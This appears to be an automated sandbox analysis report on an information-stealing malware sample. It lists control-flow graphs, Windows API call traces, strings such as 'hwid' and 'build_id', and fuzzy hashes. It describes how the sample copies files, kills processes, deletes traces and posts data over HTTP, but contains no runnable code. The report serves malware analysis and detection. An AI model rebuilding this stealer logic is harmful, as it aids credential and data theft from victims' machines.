                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2421 403af5-403bc4 _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 2438 403bc6 2421->2438 2439 403bc8-403bcb 2421->2439 2438->2439 2440 403bd1-403d4f call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 2439->2440 2441 404122-4041b1 InternetCloseHandle call 410a94 * 2 call 40f98e * 8 2439->2441 2440->2441 2512 403d55-403d88 HttpOpenRequestA 2440->2512 2513 404119-40411c InternetCloseHandle 2512->2513 2514 403d8e-403d90 2512->2514 2513->2441 2515 403d92-403da2 InternetSetOptionA 2514->2515 2516 403da8-4040b3 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40f923 call 40fa28 * 2 call 40f9e1 call 40f98e * 2 call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA call 40fb4d HttpSendRequestA 2514->2516 2515->2516 2627 4040ef-404104 InternetReadFile 2516->2627 2628 4040b5-4040ba 2627->2628 2629 404106-404114 InternetCloseHandle call 40f98e 2627->2629 2628->2629 2630 4040bc-4040ea call 40fa9c call 40f9e1 call 40f98e 2628->2630 2629->2513 2630->2627
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00403AFA
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004259CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404107
                                                                                    • InternetCloseHandle.WININET(?), ref: 0040411C
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                    • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                    • API String ID: 1139859944-3346224549
                                                                                    • Opcode ID: 6dfa883d49b08ce1d907c8d0173507c2161b387eb4e9c2766cbb1b52305e547a
                                                                                    • Instruction ID: 7cb0d70ecfea339ca3c9d0d40474d85fcafec7ec4a7ae7ad7b1869ac4000fa9b
                                                                                    • Opcode Fuzzy Hash: 6dfa883d49b08ce1d907c8d0173507c2161b387eb4e9c2766cbb1b52305e547a
                                                                                    • Instruction Fuzzy Hash: 36223BB190424CEADB11EBE4C956BEEBBB8AF18308F50417EE50573582DE781B4CCB65
                                                                                    Function 00406737 Relevance: 33.5, APIs: 22, Instructions: 511stringmemoryfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2741 406737-406760 _EH_prolog call 40fb28 2744 406762-40676a 2741->2744 2745 40676c-40677f call 40fb28 2741->2745 2746 40678a call 40f997 2744->2746 2750 406785 2745->2750 2751 406847-406854 call 40fb28 2745->2751 2752 40678f-406845 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 2746->2752 2750->2746 2751->2752 2758 40685a-406876 call 40f98e * 2 2751->2758 2789 406894-4068b0 call 40fb4d * 2 CopyFileA 2752->2789 2767 406e08-406e29 call 40f98e call 401061 2758->2767 2794 4068b2-4068dd call 40f923 call 40fa9c 2789->2794 2795 40687b-406891 call 40f95a call 411056 2789->2795 2804 4068e3-406971 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 2794->2804 2805 406976-406a4a call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40fa9c call 40f9e1 call 40f98e 2794->2805 2795->2789 2846 406a4d-406a6d call 40f98e call 40fb4d 2804->2846 2805->2846 2860 406a73-406a8e 2846->2860 2861 406db6-406dc8 call 40fb4d DeleteFileA call 40fb14 2846->2861 2868 406da2-406db5 2860->2868 2869 406a94-406aaa GetProcessHeap RtlAllocateHeap 2860->2869 2870 406dcd-406e05 call 40fb14 call 40f98e * 4 2861->2870 2868->2861 2871 406d1e-406d2b 2869->2871 2870->2767 2878 406d31-406d3d lstrlenA 2871->2878 2879 406aaf-406b5c call 40f923 * 6 call 40fb28 2871->2879 2881 406d93-406d9f memset 2878->2881 2882 406d3f-406d7d lstrlenA call 40f95a call 4010b1 call 414437 2878->2882 2916 406b66 2879->2916 2917 406b5e-406b64 2879->2917 2881->2868 2897 406d82-406d8e call 40f98e 2882->2897 2897->2881 2918 406b6c-406b83 call 40f997 call 40fb28 2916->2918 2917->2918 2923 406b85-406b8b 2918->2923 2924 406b8d 2918->2924 2925 406b93-406ba4 call 40f997 call 40fb41 2923->2925 2924->2925 2930 406bb3-406d19 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 4063b1 call 40fb4d lstrcat call 40f98e lstrcat call 40f98e * 6 2925->2930 2931 406ba6-406bae call 40f997 2925->2931 2930->2871 2931->2930
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040673C
                                                                                      • Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425DD4,00000000), ref: 0040FB31
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BD0,?,?,?,00425BA6,?,00000000), ref: 004068A8
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
                                                                                      • Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
                                                                                      • Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                      • Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                      • Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
                                                                                    • lstrcat.KERNEL32(00000000,00425BEC), ref: 00406BCD
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
                                                                                    • lstrcat.KERNEL32(00000000,00425BF0), ref: 00406BED
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00406D34
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00406D42
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 00406D9A
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00406DBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 4187064601-0
                                                                                    • Opcode ID: ea3e131a31bfade24d911b2f4923d0140332d684978b2b21ba3cf0083f7bbf7d
                                                                                    • Instruction ID: 623c21351db5d7502ddbdcae5b6d8d47bff6a1d16c2b78033439981e25a1e23c
                                                                                    • Opcode Fuzzy Hash: ea3e131a31bfade24d911b2f4923d0140332d684978b2b21ba3cf0083f7bbf7d
                                                                                    • Instruction Fuzzy Hash: 3F224871904248EADF15EBE4DD56AEEBB75AF18308F50407EF402721D2DF782A09DB26
                                                                                    Function 00408759 Relevance: 33.4, APIs: 22, Instructions: 407stringmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040875E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408841
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004089B5
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
                                                                                    • lstrcat.KERNEL32(00000000,00425DDC), ref: 00408AE6
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
                                                                                    • lstrcat.KERNEL32(00000000,00425DE0), ref: 00408B06
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408C19
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408C27
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 00408C7F
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00408CA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                    • String ID:
                                                                                    • API String ID: 156379684-0
                                                                                    • Opcode ID: 8ee0452d1c9f8879db682c44a8bd06a3f2f501328dfa6872344a5bf684e5f478
                                                                                    • Instruction ID: 517fb1482c7bf48e2daa8cc91bc62da6b68edd990b633fa38b7ec1900e684afa
                                                                                    • Opcode Fuzzy Hash: 8ee0452d1c9f8879db682c44a8bd06a3f2f501328dfa6872344a5bf684e5f478
                                                                                    • Instruction Fuzzy Hash: 11F15771804158EADB15EBE4DD1ABEEBB74AF18308F50407EE405B21E2DF782A09DB25
                                                                                    Function 0041077C Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 155memorycomtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410781
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                    • CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                    • VariantInit.OLEAUT32(?), ref: 00410855
                                                                                      • Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
                                                                                      • Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                      • Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                      • Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
                                                                                      • Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                      • Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
                                                                                    • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 00410893
                                                                                    • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory), ref: 004108A0
                                                                                    • VariantClear.OLEAUT32(?), ref: 004108E2
                                                                                    • wsprintfA.USER32 ref: 004108CC
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                    • API String ID: 2456697202-461178377
                                                                                    • Opcode ID: 6bbc65757a9dd392a9b543c355a983862ea0ffb6972efa9a5f29065882e5d019
                                                                                    • Instruction ID: 9d86073096b1dc3cc792ac086ea264928f3f197bf5d8e0195c0b1cef05d7c5cd
                                                                                    • Opcode Fuzzy Hash: 6bbc65757a9dd392a9b543c355a983862ea0ffb6972efa9a5f29065882e5d019
                                                                                    • Instruction Fuzzy Hash: 8D514B71A01228BFCB20DB95DC49EEFBB7CEF49B10F504116F515E6190D7B85A41CBA8
                                                                                    Function 004118AE Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004118B3
                                                                                    • strtok_s.MSVCRT ref: 004118E4
                                                                                    • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • lstrcpy.KERNEL32(?,?), ref: 00411A33
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411B44
                                                                                    • strtok_s.MSVCRT ref: 00411CA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                    • String ID: false$true
                                                                                    • API String ID: 49562497-2658103896
                                                                                    • Opcode ID: 42b556ca287b3747ecbd8e606c3f76c76cceba898297701c297a24441a87d915
                                                                                    • Instruction ID: db91816e4951f7301f92f20e3279e8c92673a629158fb1b6361f6b740d505876
                                                                                    • Opcode Fuzzy Hash: 42b556ca287b3747ecbd8e606c3f76c76cceba898297701c297a24441a87d915
                                                                                    • Instruction Fuzzy Hash: A1C182B190021DAFDF10EFE4D855EDE77B9AF18304F10446AF505A3191DF78AA89CB64
                                                                                    Function 00404F2A Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                                                                    • InternetCloseHandle.WININET(?), ref: 004050E6
                                                                                    • InternetCloseHandle.WININET(?), ref: 004050EF
